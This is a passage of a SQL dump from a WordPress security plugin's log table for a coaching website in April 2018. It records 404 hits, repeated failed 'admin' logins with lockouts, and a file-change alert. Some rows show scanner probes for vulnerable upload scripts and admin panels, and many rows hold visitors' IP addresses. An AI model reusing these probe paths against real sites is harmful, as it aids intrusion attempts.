(86322, 'four_oh_four', '404 Error', 3, '2018-04-28 20:44:06', '2018-04-29 01:44:06', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86323, 'four_oh_four', '404 Error', 3, '2018-04-28 20:44:06', '2018-04-29 01:44:06', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86324, 'four_oh_four', '404 Error', 3, '2018-04-28 20:44:09', '2018-04-29 01:44:09', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86325, 'four_oh_four', '404 Error', 3, '2018-04-28 20:44:10', '2018-04-29 01:44:10', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86326, 'four_oh_four', '404 Error', 3, '2018-04-28 20:50:29', '2018-04-29 01:50:29', '185.119.81.50', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86327, 'four_oh_four', '404 Error', 3, '2018-04-28 20:51:39', '2018-04-29 01:51:39', '185.85.239.195', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86328, 'four_oh_four', '404 Error', 3, '2018-04-28 20:57:39', '2018-04-29 01:57:39', '185.86.164.107', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86329, 'four_oh_four', '404 Error', 3, '2018-04-28 20:59:12', '2018-04-29 01:59:12', '185.85.239.195', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86330, 'four_oh_four', '404 Error', 3, '2018-04-28 21:03:17', '2018-04-29 02:03:17', '185.86.167.4', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86331, 'four_oh_four', '404 Error', 3, '2018-04-28 21:19:50', '2018-04-29 02:19:50', '185.85.239.110', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86332, 'four_oh_four', '404 Error', 3, '2018-04-28 21:24:24', '2018-04-29 02:24:24', '185.119.81.11', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86333, 'four_oh_four', '404 Error', 3, '2018-04-28 21:26:16', '2018-04-29 02:26:16', '185.86.164.108', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86334, 'four_oh_four', '404 Error', 3, '2018-04-28 21:32:18', '2018-04-29 02:32:18', '185.86.13.213', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86335, 'four_oh_four', '404 Error', 3, '2018-04-28 21:57:38', '2018-04-29 02:57:38', '62.210.13.58', '', 0, '/global-belief-relief/MmNSZ/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86336, 'four_oh_four', '404 Error', 3, '2018-04-28 22:11:25', '2018-04-29 03:11:25', '185.86.164.109', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86337, 'four_oh_four', '404 Error', 3, '2018-04-28 22:34:11', '2018-04-29 03:34:11', '185.86.164.107', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86338, 'four_oh_four', '404 Error', 3, '2018-04-28 22:44:55', '2018-04-29 03:44:55', '91.121.144.97', '', 0, '/', 'http://clearyourbeliefs.com/', 'a:1:{s:12:"query_string";s:6:"p=2474";}'),
(86339, 'four_oh_four', '404 Error', 3, '2018-04-28 22:44:59', '2018-04-29 03:44:59', '91.121.144.97', '', 0, '/', 'http://clearyourbeliefs.com/', 'a:1:{s:12:"query_string";s:6:"p=2474";}'),
(86340, 'four_oh_four', '404 Error', 3, '2018-04-28 22:50:37', '2018-04-29 03:50:37', '52.47.168.171', '', 0, '/global-belief-relief/ads.txt', 'http://globalbeliefrelief.com/ads.txt', 'a:1:{s:12:"query_string";s:0:"";}'),
(86341, 'four_oh_four', '404 Error', 3, '2018-04-28 22:50:39', '2018-04-29 03:50:39', '52.47.168.171', '', 0, '/global-belief-relief/ads.txt', 'http://www.globalbeliefrelief.com/ads.txt', 'a:1:{s:12:"query_string";s:0:"";}'),
(86342, 'four_oh_four', '404 Error', 3, '2018-04-28 23:11:46', '2018-04-29 04:11:46', '178.252.129.93', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(86343, 'four_oh_four', '404 Error', 3, '2018-04-28 23:11:48', '2018-04-29 04:11:48', '178.252.129.93', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(86344, 'four_oh_four', '404 Error', 3, '2018-04-28 23:17:48', '2018-04-29 04:17:48', '185.85.238.244', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86345, 'four_oh_four', '404 Error', 3, '2018-04-28 23:37:25', '2018-04-29 04:37:25', '185.86.164.106', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86346, 'four_oh_four', '404 Error', 3, '2018-04-29 00:05:08', '2018-04-29 05:05:08', '163.172.197.129', '', 0, '/global-belief-relief/wysiwygeditor/tinymce/plugins/ccSimpleUploader/uploader.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86347, 'four_oh_four', '404 Error', 3, '2018-04-29 00:22:30', '2018-04-29 05:22:30', '185.119.81.50', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86348, 'four_oh_four', '404 Error', 3, '2018-04-29 00:25:11', '2018-04-29 05:25:11', '35.226.23.240', '', 0, '/who-we-are/howard@breakthroughcoaching.cc', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86349, 'four_oh_four', '404 Error', 3, '2018-04-29 00:31:50', '2018-04-29 05:31:50', '185.86.164.108', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86350, 'four_oh_four', '404 Error', 3, '2018-04-29 00:45:13', '2018-04-29 05:45:13', '185.86.164.98', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86351, 'four_oh_four', '404 Error', 3, '2018-04-29 01:34:31', '2018-04-29 06:34:31', '185.86.164.100', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86352, 'four_oh_four', '404 Error', 3, '2018-04-29 01:51:54', '2018-04-29 06:51:54', '185.119.81.50', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}');
INSERT INTO `cyb_itsec_log` (`log_id`, `log_type`, `log_function`, `log_priority`, `log_date`, `log_date_gmt`, `log_host`, `log_username`, `log_user`, `log_url`, `log_referrer`, `log_data`) VALUES
(86353, 'four_oh_four', '404 Error', 3, '2018-04-29 02:42:00', '2018-04-29 07:42:00', '185.86.164.103', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86354, 'four_oh_four', '404 Error', 3, '2018-04-29 02:47:34', '2018-04-29 07:47:34', '185.86.164.103', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86355, 'four_oh_four', '404 Error', 3, '2018-04-29 02:59:23', '2018-04-29 07:59:23', '46.38.92.212', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86356, 'four_oh_four', '404 Error', 3, '2018-04-29 03:14:20', '2018-04-29 08:14:20', '185.85.238.244', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86357, 'four_oh_four', '404 Error', 3, '2018-04-29 03:30:47', '2018-04-29 08:30:47', '185.85.238.244', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86358, 'four_oh_four', '404 Error', 3, '2018-04-29 03:45:31', '2018-04-29 08:45:31', '207.46.13.165', '', 0, '/wp-content/uploads/2014/03/the-clear-your-beliefs-guidebook.pdf', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86359, 'four_oh_four', '404 Error', 3, '2018-04-29 03:54:05', '2018-04-29 08:54:05', '66.249.69.102', '', 0, '/who-we-are/www.RadiantClarity.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86360, 'four_oh_four', '404 Error', 3, '2018-04-29 04:13:52', '2018-04-29 09:13:52', '185.86.164.98', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86361, 'four_oh_four', '404 Error', 3, '2018-04-29 04:49:35', '2018-04-29 09:49:35', '180.191.150.101', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86362, 'four_oh_four', '404 Error', 3, '2018-04-29 05:32:30', '2018-04-29 10:32:30', '185.86.164.98', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86363, 'four_oh_four', '404 Error', 3, '2018-04-29 05:44:57', '2018-04-29 10:44:57', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86364, 'four_oh_four', '404 Error', 3, '2018-04-29 05:44:58', '2018-04-29 10:44:58', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86365, 'four_oh_four', '404 Error', 3, '2018-04-29 05:45:00', '2018-04-29 10:45:00', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86366, 'four_oh_four', '404 Error', 3, '2018-04-29 05:45:01', '2018-04-29 10:45:01', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86367, 'four_oh_four', '404 Error', 3, '2018-04-29 05:47:51', '2018-04-29 10:47:51', '185.93.3.123', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(86368, 'four_oh_four', '404 Error', 3, '2018-04-29 05:47:53', '2018-04-29 10:47:53', '185.93.3.123', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(86369, 'four_oh_four', '404 Error', 3, '2018-04-29 06:47:04', '2018-04-29 11:47:04', '185.86.164.106', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86370, 'four_oh_four', '404 Error', 3, '2018-04-29 06:50:19', '2018-04-29 11:50:19', '118.102.69.23', '', 0, '/wp-content/plugins/ready-ecommerce/templates/standard/img/tb-close.png', 'http://clearyourbeliefs.com/', 'a:1:{s:12:"query_string";s:0:"";}'),
(86371, 'four_oh_four', '404 Error', 3, '2018-04-29 06:55:37', '2018-04-29 11:55:37', '118.102.69.23', '', 0, '/wp-content/plugins/ready-ecommerce/templates/standard/img/tb-close.png', 'http://clearyourbeliefs.com/who-we-are/', 'a:1:{s:12:"query_string";s:0:"";}'),
(86372, 'four_oh_four', '404 Error', 3, '2018-04-29 06:56:11', '2018-04-29 11:56:11', '118.102.69.23', '', 0, '/wp-content/plugins/ready-ecommerce/templates/standard/img/tb-close.png', 'http://clearyourbeliefs.com/', 'a:1:{s:12:"query_string";s:0:"";}'),
(86373, 'four_oh_four', '404 Error', 3, '2018-04-29 06:56:51', '2018-04-29 11:56:51', '118.102.69.23', '', 0, '/wp-content/plugins/ready-ecommerce/templates/standard/img/tb-close.png', 'http://clearyourbeliefs.com/products_categories/coaching/', 'a:1:{s:12:"query_string";s:0:"";}'),
(86374, 'four_oh_four', '404 Error', 3, '2018-04-29 06:57:21', '2018-04-29 11:57:21', '118.102.69.23', '', 0, '/wp-content/plugins/ready-ecommerce/templates/standard/img/tb-close.png', 'http://clearyourbeliefs.com/', 'a:1:{s:12:"query_string";s:0:"";}'),
(86375, 'four_oh_four', '404 Error', 3, '2018-04-29 07:13:11', '2018-04-29 12:13:11', '85.106.123.189', '', 0, '/administrator/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86376, 'four_oh_four', '404 Error', 3, '2018-04-29 07:13:13', '2018-04-29 12:13:13', '85.106.123.189', '', 0, '/admin.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86377, 'four_oh_four', '404 Error', 3, '2018-04-29 07:13:14', '2018-04-29 12:13:14', '85.106.123.189', '', 0, '/bitrix/admin/', '', 'a:1:{s:12:"query_string";s:7:"lang=en";}'),
(86378, 'four_oh_four', '404 Error', 3, '2018-04-29 07:13:16', '2018-04-29 12:13:16', '85.106.123.189', '', 0, '/admin/login.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86379, 'four_oh_four', '404 Error', 3, '2018-04-29 07:13:17', '2018-04-29 12:13:17', '85.106.123.189', '', 0, '/admin/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86380, 'four_oh_four', '404 Error', 3, '2018-04-29 07:13:18', '2018-04-29 12:13:18', '85.106.123.189', '', 0, '/user/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86381, 'four_oh_four', '404 Error', 3, '2018-04-29 07:19:12', '2018-04-29 12:19:12', '185.86.164.108', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86382, 'four_oh_four', '404 Error', 3, '2018-04-29 07:19:52', '2018-04-29 12:19:52', '185.85.239.195', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86383, 'four_oh_four', '404 Error', 3, '2018-04-29 07:25:13', '2018-04-29 12:25:13', '185.86.164.110', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86384, 'four_oh_four', '404 Error', 3, '2018-04-29 07:44:47', '2018-04-29 12:44:47', '157.55.39.150', '', 0, '/global-belief-relief/robots.txt', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86385, 'four_oh_four', '404 Error', 3, '2018-04-29 07:50:43', '2018-04-29 12:50:43', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86386, 'four_oh_four', '404 Error', 3, '2018-04-29 07:50:44', '2018-04-29 12:50:44', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86387, 'four_oh_four', '404 Error', 3, '2018-04-29 07:50:46', '2018-04-29 12:50:46', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86388, 'four_oh_four', '404 Error', 3, '2018-04-29 07:50:47', '2018-04-29 12:50:47', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86389, 'four_oh_four', '404 Error', 3, '2018-04-29 08:09:22', '2018-04-29 13:09:22', '185.164.59.44', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(86390, 'four_oh_four', '404 Error', 3, '2018-04-29 08:09:23', '2018-04-29 13:09:23', '185.164.59.44', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(86391, 'four_oh_four', '404 Error', 3, '2018-04-29 08:12:28', '2018-04-29 13:12:28', '143.202.155.8', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(86392, 'four_oh_four', '404 Error', 3, '2018-04-29 08:12:29', '2018-04-29 13:12:29', '143.202.155.8', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(86393, 'four_oh_four', '404 Error', 3, '2018-04-29 08:18:47', '2018-04-29 13:18:47', '165.231.83.238', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(86394, 'four_oh_four', '404 Error', 3, '2018-04-29 08:18:48', '2018-04-29 13:18:48', '165.231.83.238', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(86395, 'four_oh_four', '404 Error', 3, '2018-04-29 08:34:02', '2018-04-29 13:34:02', '185.86.164.107', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86396, 'four_oh_four', '404 Error', 3, '2018-04-29 08:46:18', '2018-04-29 13:46:18', '185.85.239.195', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86397, 'four_oh_four', '404 Error', 3, '2018-04-29 09:05:09', '2018-04-29 14:05:09', '185.86.164.108', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86398, 'four_oh_four', '404 Error', 3, '2018-04-29 09:06:49', '2018-04-29 14:06:49', '185.86.164.110', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86399, 'four_oh_four', '404 Error', 3, '2018-04-29 09:33:34', '2018-04-29 14:33:34', '37.59.141.203', '', 0, '/', 'http://clearyourbeliefs.com/', 'a:1:{s:12:"query_string";s:6:"p=2474";}'),
(86400, 'four_oh_four', '404 Error', 3, '2018-04-29 09:48:01', '2018-04-29 14:48:01', '193.70.34.209', '', 0, '/global-belief-relief/update.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86401, 'four_oh_four', '404 Error', 3, '2018-04-29 10:02:26', '2018-04-29 15:02:26', '107.175.68.159', '', 0, '/', 'http://clearyourbeliefs.com/', 'a:1:{s:12:"query_string";s:6:"p=2618";}'),
(86402, 'four_oh_four', '404 Error', 3, '2018-04-29 10:02:31', '2018-04-29 15:02:31', '107.175.68.159', '', 0, '/', 'http://clearyourbeliefs.com/', 'a:1:{s:12:"query_string";s:6:"p=2618";}'),
(86403, 'four_oh_four', '404 Error', 3, '2018-04-29 10:14:24', '2018-04-29 15:14:24', '185.85.191.201', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86404, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-29 10:19:33', '2018-04-29 15:19:33', '163.172.67.180', 'admin', 0, '', '', 'a:0:{}'),
(86405, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-29 10:19:33', '2018-04-29 15:19:33', '163.172.67.180', 'admin', 0, '', '', 'a:0:{}'),
(86406, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-29 10:19:33', '2018-04-29 15:19:33', '163.172.67.180', 'admin', 0, '', '', 'a:0:{}'),
(86407, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-29 10:19:33', '2018-04-29 15:19:33', '163.172.67.180', 'admin', 0, '', '', 'a:0:{}'),
(86408, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-29 10:19:33', '2018-04-29 15:19:33', '163.172.67.180', 'admin', 0, '', '', 'a:0:{}'),
(86409, 'lockout', 'Host or User Lockout', 10, '2018-04-29 10:19:33', '2018-04-29 15:19:33', '163.172.67.180', '', 0, '', '', 'a:3:{s:7:"expires";s:19:"2018-04-29 10:34:33";s:11:"expires_gmt";s:19:"2018-04-29 15:34:33";s:4:"type";s:11:"brute_force";}'),
(86410, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-29 10:19:34', '2018-04-29 15:19:34', '204.11.50.131', 'admin', 0, '', '', 'a:0:{}'),
(86411, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-29 10:19:34', '2018-04-29 15:19:34', '204.11.50.131', 'admin', 0, '', '', 'a:0:{}'),
(86412, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-29 10:19:34', '2018-04-29 15:19:34', '204.11.50.131', 'admin', 0, '', '', 'a:0:{}'),
(86413, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-29 10:19:34', '2018-04-29 15:19:34', '204.11.50.131', 'admin', 0, '', '', 'a:0:{}'),
(86414, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-29 10:19:34', '2018-04-29 15:19:34', '204.11.50.131', 'admin', 0, '', '', 'a:0:{}'),
(86415, 'lockout', 'Host or User Lockout', 10, '2018-04-29 10:19:34', '2018-04-29 15:19:34', '204.11.50.131', '', 0, '', '', 'a:3:{s:7:"expires";s:19:"2018-04-29 10:34:34";s:11:"expires_gmt";s:19:"2018-04-29 15:34:34";s:4:"type";s:11:"brute_force";}'),
(86416, 'four_oh_four', '404 Error', 3, '2018-04-29 10:39:04', '2018-04-29 15:39:04', '66.249.69.99', '', 0, '/parklane-online-review/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86417, 'four_oh_four', '404 Error', 3, '2018-04-29 11:01:36', '2018-04-29 16:01:36', '107.175.81.141', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(86418, 'four_oh_four', '404 Error', 3, '2018-04-29 11:01:37', '2018-04-29 16:01:37', '107.175.81.141', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(86419, 'four_oh_four', '404 Error', 3, '2018-04-29 11:10:16', '2018-04-29 16:10:16', '149.167.145.60', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86420, 'four_oh_four', '404 Error', 3, '2018-04-29 11:18:19', '2018-04-29 16:18:19', '185.86.164.109', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86421, 'four_oh_four', '404 Error', 3, '2018-04-29 11:48:48', '2018-04-29 16:48:48', '185.86.164.107', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86422, 'four_oh_four', '404 Error', 3, '2018-04-29 12:25:03', '2018-04-29 17:25:03', '185.86.164.101', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86423, 'four_oh_four', '404 Error', 3, '2018-04-29 12:45:18', '2018-04-29 17:45:18', '185.86.164.106', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86424, 'four_oh_four', '404 Error', 3, '2018-04-29 12:47:36', '2018-04-29 17:47:36', '185.119.81.11', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86425, 'four_oh_four', '404 Error', 3, '2018-04-29 12:48:43', '2018-04-29 17:48:43', '200.48.210.5', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(86426, 'four_oh_four', '404 Error', 3, '2018-04-29 12:48:44', '2018-04-29 17:48:44', '200.48.210.5', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(86427, 'four_oh_four', '404 Error', 3, '2018-04-29 12:49:21', '2018-04-29 17:49:21', '185.85.239.110', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86428, 'four_oh_four', '404 Error', 3, '2018-04-29 13:05:05', '2018-04-29 18:05:05', '185.85.190.132', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86429, 'four_oh_four', '404 Error', 3, '2018-04-29 13:25:23', '2018-04-29 18:25:23', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86430, 'four_oh_four', '404 Error', 3, '2018-04-29 13:25:23', '2018-04-29 18:25:23', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86431, 'four_oh_four', '404 Error', 3, '2018-04-29 13:25:26', '2018-04-29 18:25:26', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86432, 'four_oh_four', '404 Error', 3, '2018-04-29 13:25:27', '2018-04-29 18:25:27', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86433, 'four_oh_four', '404 Error', 3, '2018-04-29 13:32:48', '2018-04-29 18:32:48', '223.186.27.93', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86434, 'four_oh_four', '404 Error', 3, '2018-04-29 14:16:06', '2018-04-29 19:16:06', '185.85.191.201', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86435, 'four_oh_four', '404 Error', 3, '2018-04-29 14:36:52', '2018-04-29 19:36:52', '185.86.164.103', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86436, 'four_oh_four', '404 Error', 3, '2018-04-29 14:41:42', '2018-04-29 19:41:42', '185.85.239.110', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86437, 'four_oh_four', '404 Error', 3, '2018-04-29 14:59:04', '2018-04-29 19:59:04', '185.86.164.98', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86438, 'four_oh_four', '404 Error', 3, '2018-04-29 15:03:29', '2018-04-29 20:03:29', '185.86.164.110', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86439, 'four_oh_four', '404 Error', 3, '2018-04-29 15:12:39', '2018-04-29 20:12:39', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86440, 'four_oh_four', '404 Error', 3, '2018-04-29 15:12:40', '2018-04-29 20:12:40', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86441, 'four_oh_four', '404 Error', 3, '2018-04-29 15:12:43', '2018-04-29 20:12:43', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86442, 'four_oh_four', '404 Error', 3, '2018-04-29 15:12:44', '2018-04-29 20:12:44', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86443, 'four_oh_four', '404 Error', 3, '2018-04-29 15:13:41', '2018-04-29 20:13:41', '87.98.217.58', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(86444, 'four_oh_four', '404 Error', 3, '2018-04-29 15:13:41', '2018-04-29 20:13:41', '87.98.217.58', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(86445, 'four_oh_four', '404 Error', 3, '2018-04-29 15:25:18', '2018-04-29 20:25:18', '185.85.191.196', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86446, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-29 15:30:11', '2018-04-29 20:30:11', '51.15.72.211', 'admin', 0, '', '', 'a:0:{}'),
(86447, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-29 15:30:11', '2018-04-29 20:30:11', '51.15.72.211', 'admin', 0, '', '', 'a:0:{}'),
(86448, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-29 15:30:11', '2018-04-29 20:30:11', '51.15.72.211', 'admin', 0, '', '', 'a:0:{}'),
(86449, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-29 15:30:11', '2018-04-29 20:30:11', '51.15.72.211', 'admin', 0, '', '', 'a:0:{}'),
(86450, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-29 15:30:11', '2018-04-29 20:30:11', '51.15.72.211', 'admin', 0, '', '', 'a:0:{}'),
(86451, 'lockout', 'Host or User Lockout', 10, '2018-04-29 15:30:11', '2018-04-29 20:30:11', '51.15.72.211', '', 0, '', '', 'a:3:{s:7:"expires";s:19:"2018-04-29 15:45:11";s:11:"expires_gmt";s:19:"2018-04-29 20:45:11";s:4:"type";s:11:"brute_force";}'),
(86452, 'four_oh_four', '404 Error', 3, '2018-04-29 15:38:46', '2018-04-29 20:38:46', '185.86.164.98', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86453, 'four_oh_four', '404 Error', 3, '2018-04-29 15:39:36', '2018-04-29 20:39:36', '185.86.164.102', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86454, 'four_oh_four', '404 Error', 3, '2018-04-29 15:59:11', '2018-04-29 20:59:11', '185.86.164.110', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86455, 'four_oh_four', '404 Error', 3, '2018-04-29 16:14:55', '2018-04-29 21:14:55', '185.86.164.106', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86456, 'file_change', 'File Changes Detected', 8, '2018-04-29 16:53:01', '2018-04-29 21:53:01', '', '', 0, '', '', 'a:4:{s:5:"added";a:0:{}s:7:"removed";a:0:{}s:7:"changed";a:2:{s:59:"wp-content/plugins/ready-ecommerce/modules/cache/index.html";a:2:{s:1:"h";s:32:"d41d8cd98f00b204e9800998ecf8427e";s:1:"d";s:10:"1525009701";}s:82:"wp-content/plugins/ready-ecommerce/modules/cache/timthumb_cacheLastCleanTime.touch";a:2:{s:1:"h";s:32:"d41d8cd98f00b204e9800998ecf8427e";s:1:"d";s:10:"1525009701";}}s:6:"memory";s:5:"39.41";}'),
(86457, 'four_oh_four', '404 Error', 3, '2018-04-29 17:04:28', '2018-04-29 22:04:28', '185.86.164.100', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86458, 'four_oh_four', '404 Error', 3, '2018-04-29 17:24:34', '2018-04-29 22:24:34', '181.162.250.204', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
